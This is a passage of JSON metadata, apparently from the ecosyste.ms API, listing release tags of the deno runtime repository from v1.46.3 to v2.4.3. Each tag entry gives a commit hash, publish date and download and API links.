:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden